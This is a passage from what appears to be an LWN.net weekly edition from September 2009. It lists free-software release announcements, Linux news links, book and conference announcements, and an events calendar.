- libpciaccess 0.10.7 (new features and bug fixes)
- libpciaccess 0.10.8 (bug fix)
- libXau 1.0.5 (new features and code cleanup)
- libXcursor 1.1.10 (code cleanup and documentation work)
- libXinerama 1.0.99.1 (code cleanup and documentation work)
- libXxf86dga 1.0.99.1 (code cleanup and documentation work)
- libXxf86vm 1.0.99.1 (code cleanup and documentation work)
- pixman 0.16.0 (new features and code cleanup)
- videoproto 2.3.0 (packaging changes)
- xcmiscproto 1.2.0 (packaging changes)
- xf86bigfontproto 1.2.0 (packaging changes)
- xf86dgaproto 2.0.99.1 (packaging changes)
- xf86driproto 2.1.0 (packaging changes)
- xf86-video-geode 2.11.4 (bug fixes, code cleanup and documentation work)
- xf86-video-geode 2.11.4.1 (bug fix)
- xf86-video-glide 1.0.3 (code cleanup)
- xf86vidmodeproto 2.2.99.1 (packaging changes)
- xineramaproto 1.1.99.1 (packaging changes)
Electronics
gEDA/gaf 1.5.4-20090830 released
Unstable development snapshot 1.5.4-20090830 of gEDA/gaf, a collection of electronic design and analysis tools, has been announced. "gEDA/gaf v1.5.3 had some release critical bugs (DOA) so it has been withdrawn and is no longer available for download. Please download, build, and run gEDA/gaf v1.5.4."
TimingAnalyzer 0.932 beta released
Version 0.932 beta of TimingAnalyzer is available with a bug fix. "The TimingAnalyzer can be used to easily draw timing diagrams and perform timing analysis to find faults in digital systems. The diagrams can be saved in many different image file formats and scalable vector formats so they can easily be added to documentation. With Python scripts, the user can draw large complex timing diagrams quickly, generate test vectors and testbenches for analog and digital simulations, and add new features to the program. Written in Java, it runs on any platform that supports the Java Run-time Environment (JRE1.6.0) or Java Development Kit JDK1.6.0 or newer."
Encryption Software
M2Crypto 0.20.1 released
Version 0.20.1 of M2Crypto has been announced, it includes a bug fix. "M2Crypto is the most complete Python wrapper for OpenSSL featuring RSA, DSA, DH, HMACs, message digests, symmetric ciphers (including AES); SSL functionality to implement clients and servers; HTTPS extensions to Python's httplib, urllib, and xmlrpclib; unforgeable HMAC'ing AuthCookies for web session management; FTP/TLS client and server; S/MIME; ZServerSSL: A HTTPS server for Zope and ZSmime: An S/MIME messenger for Zope. Smartcards supported with the Engine interface."
Financial Applications
Gnucash 2.3.5 released
Version 2.3.5 of Gnucash has been announced. "The GnuCash development team proudly announces GnuCash 2.3.5, the sixth of several unstable 2.3.x releases of the GnuCash Free Accounting Software which will eventually lead to the stable version 2.4.0. With this new release series, GnuCash can use an SQL database using SQLite3, MySQL or PostgreSQL. It runs on GNU/Linux, *BSD, Solaris, Microsoft Windows and Mac OSX. This release is intended for developers and testers who want to help tracking down all those bugs that are still in there."
Music Applications
Ardour MIDI editing sneak preview
A sneak preview of the upcoming Ardour MIDI editing capability has been announced. "Ardour 3 is still not ready for testing by non-developing users, but I wanted to provide a preview of the way the "inline" MIDI editing system is taking shape, and to provide a record of key- and mouse-bindings for future manual writers."
aseqmm 0.1.0 released
Version 0.1.0 of aseqmm has been announced. "aseqmm is a C++ wrapper around the ALSA library sequencer interface using Qt4 objects, idioms and style. ALSA sequencer provides software support for MIDI technology on Linux. This is the first public release of aseqmm."
Office Suites
OpenOffice.org 3.1.1 is available
Version 3.1.1 of OpenOffice.org has been announced. "Full details of the bugs fixed may be found in the release notes. Details of the security vulnerabilities fixed will be published in our security bulletin on September 11th when the standard public disclosure embargo expires. To our knowledge, none of these vulnerabilities has been exploited; however, in accordance with industry best practice, we recommend all users of earlier versions to upgrade to 3.1.1."
Miscellaneous
BleachBit 0.6.3 released
Version 0.6.3 of BleachBit has been announced. "BleachBit deletes trace files to maintain your privacy and deletes junk to recover disk space. Notable changes for 0.6.1: * Clear unused inode data on ext3 and ext4 (and try on other file systems) to hide the metadata (filename, file size, date) of previously deleted files * Delete Windows system logs * Update 18 translations".
IMDbPY 4.2 released
Version 4.2 of IMDbPY has been announced. "IMDbPY is a Python package useful to retrieve and manage the data of the IMDb movie database about movies, people, characters and companies. With this release, a lot of bugs were fixed, and some minor new features introduced."
Languages and Tools
C
GCC 4.4.2 Status Report
The September 1, 2009 edition of the GCC 4.4.2 Status Report has been published. "The 4.4 branch is open for commits under the usual release branch rules. The timing of the 4.4.2 release (at least two months after the 4.4.1 release, so no sooner than September 22, at a point when there are no P1 regressions open for the branch) has yet to be determined."
LLVM 2.6 pre-1 released
Version 2.6 pre-1 of LLVM, the Low Level Virtual Machine Compiler Infrastructure, has been announced. "2.6 pre-release1 is ready to be tested by the community. You will notice that we have quite a few pre-compiled binaries (of both clang and llvm-gcc). We have identified several bugs that will be fixed in pre-release2, so please search the bug database before filing a new bug. If you have time, I'd appreciate anyone who can help test the release."
Caml
Caml Weekly News
The September 1, 2009 edition of the Caml Weekly News is out with new articles about the Caml language.
Python
cssutils 0.9.6b5 released
Version 0.9.6b5 of cssutils has been announced, it is a bug fix release. "what is it? A Python package to parse and build CSS Cascading Style Sheets. (Not a renderer though!)"
Jython 2.5.1 release candidate 1 is out
Release candidate 1 of Jython 2.5.1, an implementation of Python in Java, has been released. "Jython 2.5.1rc1 fixes a number of bugs, including some major errors when using coroutines and when using relative imports."
pylib/py.test 1.0.2 released
Version 1.0.2 of pylib/py.test has been announced. "i just pushed a pylib/py.test 1.0.2 maintenance release, fixing several issues triggered by fedora packaging. Also added a link to the new pytest_django plugin, a changelog and some other improvements."
pylint 0.18.1 / astng 0.19.1 released
Version 0.18.1 of pylint and version 0.19.1 of astng have been announced, both include bug fixes. Pylint: "analyzes Python source code looking for bugs and signs of poor quality."
PyYAML 3.09 released
Version 3.09 of PyYAML, a YAML parser and emitter for Python, has been announced; it includes a number of bug fixes.
Python-URL! - weekly Python news and links
The September 2, 2009 edition of the Python-URL! is online with a new collection of Python article links.
Tcl/Tk
Tcl-URL! - weekly Tcl news and links
The August 27, 2009 edition of the Tcl-URL! is online with new Tcl/Tk articles and resources.
Version Control
GIT 1.6.4.2 released
Version 1.6.4.2 of the GIT distributed version control system has been announced; it includes several bug fixes and documentation updates.
vadm 0.6.0 released
Version 0.6.0 of vadm has been announced. "i just uploaded vadm-0.6.0 to PyPI: a svn-like command line tool for non-intrusively versioning posix files and ownership information."
Page editor: Forrest Cook
Linux in the news
Trade Shows and Conferences
Fake Linus Torvalds Set For Web Vitriol Barrage (ChannelWeb)
ChannelWeb covers the Linux Foundation's Fake Linus Torvalds contest. "You've probably heard of Fake Steve Jobs. Now get ready for Fake Linus Torvalds. The Linux Foundation is running a contest in which four different Fake Linus Torvalds will post Twitter messages from the Identi.ca and Twitter feeds, all in an attempt to portray themselves as the most compelling facsimile to the father of Linux. In a blog post earlier this week, Jim Zemlin, executive director at The Linux Foundation, said he expects that some of the posts from the Fake Torvalds will be "dangerously outrageous," while others will be "downright funny.""
The SCO Problem
The Hon. Ted Stewart and the Hon. Tena Campbell (Groklaw)
Groklaw introduces the Honorable Ted Stewart and the Honorable Tena Campbell. "The Hon. Tena Campbell is the Chief Judge, and she is assigned to SCO v. IBM. Her bio is here. She was appointed by President Bill Clinton, as was Judge Stewart, the judge assigned now to the SCO v. Novell case. That doesn't mean they were his picks, just that they were appointed during his presidency." Ted Stewart has been assigned to the SCO v. Novell case.
Business
Windows Loses Money, Linux Nears the $1 Billion Mark (Softpedia)
Softpedia contrasts the growth of Linux to the loss of revenue for Microsoft. "In a time when Microsoft is feeling the full impact of the global economic downturn, the open-source Linux operating system is flourishing. While Windows client revenue has let the Redmond company suffering in the 2009 fiscal year, producing three quarters inferior when compared to FY2008, Linux revenue continues to grow and is right on track of making the open-source OS a $1 billion a year business. Market analysis firm IDC estimates that between 2008 and 2013 Linux revenue will deliver a compound annual growth rate (CAGR) of no less than 16.9%."
Linux at Work
Man Uses Linux and CD Tray to Rock Baby to Sleep (Switched)
Linux has many novel uses, including infant care. "Parents of newborns sometimes devise ingenious MacGyver-esque devices to keep their babies entertained, or to, more importantly, soothe them to sleep. One inventive techie, who goes by the YouTube handle macjonesnz, has created a ridiculously inexpensive self-rocking chair using only his computer and a piece of string."
Legal
Public Citizen: Official Word from US Courts -- Feel Free to Use RECAP With Our Blessing
Public Citizen has updated its earlier posting about RECAP, which we linked to earlier in the week. RECAP is a Firefox extension that assists in sharing court documents from PACER; it had appeared that the US federal court system was scare-mongering about "open source" in a warning it sent out. "To the extent that messages from some districts sounded more severe, it was simply a matter of reminding all of our ECF filers to be careful about computer security and was not intended to discourage use of RECAP."
Reviews
Iomega intros four-bay NAS (Macworld)
Macworld reviews the Iomega StorCenter ix4-200d Network Attached Storage device. "It comes in 2, 4 and 8 terabyte configurations for $700, $900 and $1,900 respectively. The StorCenter x4-200d features four hot-swappable SATA II drive bays which come configured as a RAID 5 array, but can also be configured as a RAID 10 (with automatic RAID rebuild) or as a JBOD (Just a Bunch Of Disks) configuration. Inside, the system is running an embedded Linux operating system equipped with EMC LifeLine software."
Miscellaneous
Microsoft contract forces cancellation of Stallman talk in Argentina (Matware)
The "Matware" site has a brief article (in Spanish) stating that a planned talk by Richard Stallman at the Argentinian National Technological University, Mar del Plata, has been canceled as the result of contracts signed with Microsoft. Said contracts, it is said, prohibit the university from criticizing the company or its products. English translation is available via Google.
Page editor: Forrest Cook
Announcements
Commercial announcements
Gil: Here comes Maemo 5
Quim Gil's Maemo 5 hype posting (associated with the N900 phone launch) has some encouraging text: "If freedom is your concern then you dont need to 'unlock' or 'jailbreak' Maemo 5. From installing an application to getting root access, its you who decide. We trust you, and at the end its your device. Nokia also trusts the open source community in general and the Maemo community particularly helping in getting casual users through the experience path. The N900 might just be a new and successful entry point for a new wave of open source users and developers."
Tucows: Copyright's creative disincentive
Worth a read: this submission from Tucows to the Canadian copyright consultation process. "The nice thing about that argument is that it makes a factual claim: Weaken copyright and you decrease innovation. That the facts so resoundingly, enthusiastically, thumpingly dispute that conclusion tells us that the syllogism is wrong. Indeed, the facts say the syllogism has it backwards. Current copyright laws are holding back the innovation they were intended to spur."
New Books
Netbooks: The Missing Manual--New from O'Reilly
O'Reilly has published the book Netbooks: The Missing Manual by J.D. Biersdorfer.
Should you wish to purchase this book, you can get it from Amazon.com and help LWN earn a little money.
Book Excerpt: The Official Ubuntu Book (Linux Journal)
Linux Journal has published a new book excerpt. "Read an adapted version of chapter 3 from the book The Official Ubuntu Book By Benjamin Mako Hill, Matthew Helmke, Corey Burger. This article is an adapted excerpt of Chp 3 from the "The Official Ubuntu Book"".
Should you wish to purchase this book, you can get it from Amazon.com and help LWN earn a little money.
web2py book 2nd Edition is available
The second edition of the web2py book has been announced. "Lots of new stuff with 100 more pages (341 pages in total). Covers Auth, Crud, Services, interaction with Pyjamas, PyAMF, and better deployment recipes."
Resources
Linux Gazette #166 is out
The September, 2009 edition of the Linux Gazette has been published. Topics include: "* Mailbag * Talkback * 2-Cent Tips * News Bytes, by Deividson Luiz Okopnik and Howard Dyckoff * Away Mission: VMware World, Digital ID World and Intel Developer Forum, by Howard Dyckoff * Linux Layer 8 Security: Taking off the Blinders, or Looking for Proof after Suspicion, by Lisa Kachold * Using Linux to Teach Kids How to Program, 10 Years Later (Part I), by Anderson Silva * Internet Radio Router, by Dr. Volker Ziemann * XKCD, by Randall Munroe * Doomed to Obscurity, by Pete Trbovich * The Back Page, by Kat Tanaka Okopnik".
Education and Certification
Linux Professional Institute hosts exam labs at Ohio LinuxFest 2009
The Linux Professional Institute will host exam labs at the Ohio LinuxFest 2009 on September 27. "This is the fourth year that LPI has been certification sponsor for Ohio LinuxFest and the event this year will be celebrating the 40th Anniversary of the Unix operating system."
Calls for Presentations
O'Reilly Where 2.0 Conference cfp
A call for papers has gone out for the 2010 O'Reilly Where 2.0 Conference. "The O'Reilly Where 2.0 Conference will redefine the boundaries of location-enabled technology March 30-April 1, 2010, at the Marriott San Jose, in San Jose, California. Program chair Brady Forrest and O'Reilly Media invite the builders and innovators in the geospatial industry to submit proposals for sessions and workshops at the sixth Where 2.0." Proposals are due by October 13.
Upcoming Events
Mini-DebConf Taiwan 2009
The Mini-DebConf Taiwan 2009 has been announced. "The "Software Liberty Association of Taiwan"(SLAT) is featuring a mini-DebConf during ICOS 2009 - International Conference on Open Source in Taipei in September, 2009. It's the 1st mini-DebConf in Taiwan, and would possibly become the 2nd Asia mini-DebConf (if DDs from China/Japan/Korea/Hong Kong can be join as well) since the 1st was on 2005 in Beijing. Please join us in Taipei on Saturday 26th and Sunday 27th of September, 2009."
Apache Foundation's Gianugo Rabellino to Keynote openSUSE Conference
The opening and closing keynotes for the openSUSE Conference have been announced. "The openSUSE Conference is an opportunity for openSUSE contributors to attend talks, workshops, Birds of a Feather sessions, and collaborate together face to face. The conference will be held from September 17 through September 20 in Nürnberg, Germany."
Red Hat/Fedora/JBoss Developer conference in Brno, Czech Republic
The next Red Hat/Fedora/JBoss Developer conference has been announced. "If you don't have any plans for September 10th and 11th, plan a trip to Czech Republic! Red Hat Brno office is organizing an open conference at Masaryk University in Brno, CZ".
Events: September 10, 2009 to November 9, 2009
The following event listing is taken from the LWN.net Calendar.
| Date(s) | Event | Location |
|---|---|---|
| September 7–September 11 | XtreemOS summer school | Oxford, UK |
| September 8–September 12 | DjangoCon '09 | Portland, OR, USA |
| September 10–September 11 | Fedora Developer Conference 2009 | Brno, Czech Republic |
| September 12 | Evil Robot Conference (Free Conference, Free Software) | Raleigh, NC, USA |
| September 14–September 18 | Django Bootcamp at the Big Nerd Ranch | Atlanta, Georgia, USA |
| September 15–September 17 | International Conference on IT Security Incident Management and IT Forensics | Stuttgart, Germany |
| September 17–September 18 | Internet Security Operations and Intelligence 7 | San Diego, CA, USA |
| September 17–September 20 | openSUSE Conference | Nuremberg, Germany |
| September 18–September 19 | BruCON | Brussels, Belgium |
| September 18–September 20 | EuroBSDCon 2009 | Cambridge, UK |
| September 19 | Atlanta Linux Fest 2009 | Atlanta, Georgia, USA |
| September 19 | Beijing Perl Workshop | Beijing, China |
| September 19 | Software Freedom Day | Worldwide |
| September 20 | SELinux Developer Summit 2009 @ LinuxCon | Portland, Oregon, USA |
| September 21–September 23 | LinuxCon 2009 | Portland, OR, USA |
| September 21–September 25 | Ruby on Rails Bootcamp with Charles B. Quinn | Atlanta, USA |
| September 23–September 25 | Linux Plumbers Conference | Portland, Oregon, USA |
| September 23–September 25 | Recent Advances in Intrusion Detection | Saint-Malo, Brittany, France |
| September 23–September 25 | OpenSolaris Developer Conference 2009 | Hamburg, Germany |
| September 23 | Bacula Conference 2009 | Cologne, Germany |
| September 24–September 26 | Joomla! and Virtue Mart Day Germany | Bad Nauheim, Germany |
| September 25–September 27 | International Conference on Open Source | Taipei, Taiwan |
| September 25–September 27 | Ohio LinuxFest | Columbus, Ohio, USA |
| September 26–September 27 | PyCon India 2009 | Bengaluru, India |
| September 26 | Open Source Conference 2009 Okinawa | Ginowan City, Okinawa, Japan |
| September 26–September 27 | Mini-DebConf at ICOS | Taipei, Taiwan |
| September 28–September 30 | Real Time Linux Workshop | Dresden, Germany |
| September 28–September 30 | X Developers' Conference 2009 | Portland, OR, USA |
| September 28–October 2 | Sixteenth Annual Tcl/Tk Conference (2009) | Portland, OR, USA |
| September 30 | HCC!Linux Theme Day | Houten, Netherlands |
| October 1–October 2 | Open World Forum | Paris, France |
| October 2–October 4 | 7th International Conference on Scalable Vector Graphics | Mountain View, CA, USA |
| October 2 | LLVM Developers' Meeting | Cupertino, CA, USA |
| October 2–October 4 | Linux Autumn (Jesien Linuksowa) 2009 | Huta Szklana, Poland |
| October 2–October 4 | Ubuntu Global Jam | Online |
| October 2–October 3 | Open Source Developers Conference France | Paris, France |
| October 2 | Mozilla Public DevDay/Open Web Camp 2009 | Prague, Czech Republic |
| October 3–October 4 | T-DOSE 2009 | Eindhoven, The Netherlands |
| October 3–October 4 | EU MozCamp 2009 | Prague, Czech Republic |
| October 7–October 9 | Jornadas Regionales de Software Libre | Santiago, Chile |
| October 8–October 10 | Utah Open Source Conference | Salt Lake City, Utah, USA |
| October 9–October 11 | Maemo Summit 2009 | Amsterdam, The Netherlands |
| October 10–October 12 | Gnome Boston Summit | Cambridge, MA, USA |
| October 10 | OSDN Conference 2009 | Kiev, Ukraine |
| October 12–October 14 | Qt Developer Days | Munich, Germany |
| October 15–October 16 | Embedded Linux Conference Europe 2009 | Grenoble, France |
| October 16–October 17 | Pycon Poland 2009 | Ustron, Poland |
| October 16–October 18 | Pg Conference West 09 | Seattle, WA, USA |
| October 16–October 18 | German Ubuntu conference | Göttingen, Germany |
| October 18–October 20 | 2009 Kernel Summit | Tokyo, Japan |
| October 19–October 22 | ZendCon 2009 | San Jose, CA, USA |
| October 21–October 23 | Japan Linux Symposium | Tokyo, Japan |
| October 22–October 24 | Décimo Encuentro Linux 2009 | Valparaiso, Chile |
| October 23–October 24 | Ontario GNU Linux Fest | Toronto, Ontario, Canada |
| October 23–October 24 | PGCon Brazil 2009 | Sao Paulo, Brazil |
| October 24–October 25 | PyTexas | Fort Worth, TX, USA |
| October 24–October 25 | FOSS.my 2009 | Kuala Lumpur, Malaysia |
| October 24 | Florida Linux Show 2009 | Orlando, Florida, USA |
| October 24 | LUG Radio Live | Wolverhampton, UK |
| October 25 | Linux Outlaws and Ubuntu UK Podcast OggCamp | Wolverhampton, UK |
| October 26–October 28 | Techno Forensics and Digital Investigations Conference | Gaithersburg, MD, USA |
| October 26–October 28 | GitTogether '09 | Mountain View, CA, USA |
| October 26–October 28 | Pacific Northwest Software Quality Conference | Portland, OR, USA |
| October 27–October 30 | Linux-Kongress 2009 | Dresden, Germany |
| October 28–October 30 | Hack.lu 2009 | Luxembourg |
| October 28–October 30 | no:sql(east) | Atlanta, USA |
| October 29 | NLUUG autumn conference: The Open Web | Ede, The Netherlands |
| October 30–November 1 | YAPC::Brasil 2009 | Rio de Janeiro, Brazil |
| October 31 | Linux theme day with Ubuntu install party | Ede, Netherlands |
| November 1–November 6 | 23rd Large Installation System Administration Conference | Baltimore, MD, USA |
| November 2–November 6 | ApacheCon 2009 | Oakland, CA, USA |
| November 2–November 6 | Ubuntu Open Week | Internet |
| November 3–November 6 | OpenOffice.org Conference | Orvieto, Italy |
| November 4–November 5 | Linux World NL | Utrecht, The Netherlands |
| November 5 | Government Open Source Conference | Washington, DC, USA |
| November 6–November 8 | WineConf 2009 | Enschede, Netherlands |
| November 6–November 10 | CHASE 2009 | Lahore, Pakistan |
| November 6–November 7 | PGDay.EU 2009 | Paris, France |
| November 7–November 8 | OpenFest 2009 - Biggest FOSS conference in Bulgaria | Sofia, Bulgaria |
| November 7–November 8 | OpenRheinRuhr | Bottrop, Germany |
| November 7–November 8 | Kiwi PyCon 2009 | Christchurch, New Zealand |
If your event does not appear here, please tell us about it.
Page editor: Forrest Cook
